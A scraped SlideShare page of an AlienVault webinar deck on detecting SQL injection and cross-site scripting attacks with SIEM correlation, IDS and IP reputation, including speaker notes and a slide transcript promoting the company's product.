Your SlideShare is downloading. ×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

3,115
views

Published on

Two of the oldest and most common attacks used against web applications, SQL injection attacks and cross-site scripting attacks (XSS), continue to impact thousands of websites and millions of users …

Two of the oldest and most common attacks used against web applications, SQL injection attacks and cross-site scripting attacks (XSS), continue to impact thousands of websites and millions of users each year. Finding these exposures quickly is essential in order to prevent system compromise and avoid information leakage. SIEM solutions can be invaluable in this effort by collecting and correlating the data you need to identify patterns that signal an attack.

Join AlienVault for this session to learn:

*What data you need to collect to identify the warning signs of an attack
*How to use event correlation to detect cross-site scripting (XSS) and SQL Injection attacks
*How to identify impacted assets so you can quickly limit the damage

You'll come away from the session with a clear picture of how to use SIEM technology to prevent these attacks.

Published in: Technology

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,115
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
105
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • \
  • Who do we sell toHow to find themHow to engageEmphasis on categories in which we play (e.g. IDS, Vuln Assessment, Asset Discovery...)Quick market/vendor overview of these categories (high level competitive)
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • So how do we do this ? We’ve pieced together all of the necessary security tools to feed the correlation engine, provide meaningful data, and manage entire networks from a single-pane-of-glass. -The essential elements of a SIEM are the ability to capture events and pull these into an engine that can parson, normalize, correlate, and log them.-What most folks in the security world will tell you is that in order to have a battle tested security solution – you need to extend the capabilities of that SIEM to take other information than just the logs. And we’ve done just that.-First, we realize folks need to know what assets are on their system to protect. We do that by building in Asset Discovery Tools, where we can automatically populate a database of assets on your network by scanning both passively and actively, identifying hosts and installed software packages.-Once we’ve identified what’s on your networks at all times, we’ve built in the ability to find out where your system might be vulnerable. Vulnerability assessment tools allow us to cross correlate vulnerability information with up to date detection rules to identify the weaknesses that hackers exploit. -On top of that, our built in Threat detection tools are actively searching for breaching attempts. Our aim is to cover all of your bases to include Host based IDS, Network IDS, File Integrity Monitoring and even Wireless IDS. -The 4th piece is behavioral monitoring. Security teams need to track user behavior that will give you the coverage you need for unknown threats – typically exemplified by strange or anomalous network or system behavior – this includes netflow analysis, service availability and of course log collection and analysis for in-depth forensic investigations.-Finally, aggregatiing these security controls altogether for correlation and analysis provides the intelligence you need in order to stay ahead of the bad guys and be pro-active instead of reactive in your security approach.
  • In fact, AlienVault offers the only unified security management solution to unify the five essential security capabilities you need for complete security visibility. This translates into rapid time to value – faster and easier audits, targeted remediation, and more seamless incident response.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • Transcript

    • 1. HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION Tom D’Aquino, Sr. SIEM Engineer
    • 2. AGENDA Todays Threat Landscape: Realities & Implications Web Application Attacks: What are they and what harm can they bring? Threat detection through correlation of NIDS, HIDS and IP Reputation AlienVault Unified Security Management (USM) at a glance Demo environment details Live Demo of USM  Data collection and correlation from a Network IDS to detect web application attacks  Leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks
    • 3. THREAT LANDSCAPE: OUR NEW REALITY More and more organizations are finding themselves in the crosshairs of various bad actors for a variety of reasons. The number of organizations experiencing high profile breaches is unprecedented ~ SMB increasingly become the target. In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2013 was businesses with fewer than 250 employees; 31% of all attacks targeted them.
    • 4. THREAT LANDSCAPE: WEB APPLICATION ATTACKS XSS or Cross Site Scripting and SQL Injection are common methods of attacking web applications. XSS attacks give attackers the ability to inject malicious code into websites they do not own SQL Injection attacks allow attackers to extract information from a website such as sensitive user information or user credentials
    • 5. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS XSS attacks are typically used to compromise a user’s local system and install malware or to impersonate a user on some other website through cookie hijacking. XSS attacks typically require some kind of web form that allows users to post content to the website such as: Comment forms on blog sites Forums, message boards, etc. XSS attacks are easy to carry out using tools like the Browser Explotation Framework (BeEF): http://beefproject.com/
    • 6. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED) Once the script is inserted into the web page, it is automatically executed by the victim’s web browser when the web page is loaded.
    • 7. THREAT LANDSCAPE: SQL INJECTION ATTACKS SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include: User account information, i.e. email addresses and passwords Stored credit card data System configuration details
    • 8. THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED) There are SQL Injection tricks that the hackers can use to find your interesting data such as viewing all of the tables in the database:
    • 9. THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION Network IDS is embedded in our platform, giving you the ability to detect network level attacks including identifying malicious web requests sent to your web server. Network IDS signatures are updated frequently to keep you on the front lines of advanced detection
    • 10. THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks. Web server log monitoring File integrity checking Operating system logging Centralized management
    • 11. THE ALIENVAULT USM SOLUTION: IP REPUTATION Tracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site. Automatically correlates known attackers with malicious activity detected from both the network and host intrusion detection systems
    • 12. Security Asset Discovery Piece it all Intelligence together Look for strange Behavioral activity which could Monitoring indicate a threat • • • • Active Network Scanning Passive Network Scanning Asset Inventory Host-based Software Inventory Vulnerability Assessment Figure out what Asset is valuable Discovery • Network Vulnerability Testing Threat Detection • • • • Network IDS Host IDS Wireless IDS File Integrity Monitoring Behavioral Monitoring Threat Start looking for threats Detection Identify ways the Vulnerability target could be Assessment compromised • Log Collection • Netflow Analysis • Service Availability Monitoring Security Intelligence • SIEM Correlation • Incident Response
    • 13. UNIFIED SECURITY MANAGEMENT “Security Intelligence through Integration that we do, NOT you” USM Platform • • Bundled Products - 30 Open-Source Security tools to plug the gaps in your existing controls • • USM Framework - Configure, Manage, & Run Security Tools. Visualize output and run reports USM Extension API - Support for inclusion of any other data source into the USM Framework Open Threat Exchange –Provides threat intelligence for collaborative defense
    • 14. DEMO NETWORK DETAILS The demo environment that we are testing in today contains the following:
    • 15. NON-DEFAULT CONFIGURATION Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent
    • 16. NOW FOR SOME Q&A… Three Ways to Test Drive AlienVault Download a Free 30-Day Trial http://www.alienvault.com/free-trial Try our Interactive Demo Site http://www.alienvault.com/live-demo-site Join us for a live Demo http://www.alienvault.com/marketing/alienvault-usmlive-demo Questions? hello@alienvault.com
    • 17. VIEW ON-DEMAND VIDEO To view a recorded version of this webcast On-Demand CLICK HERE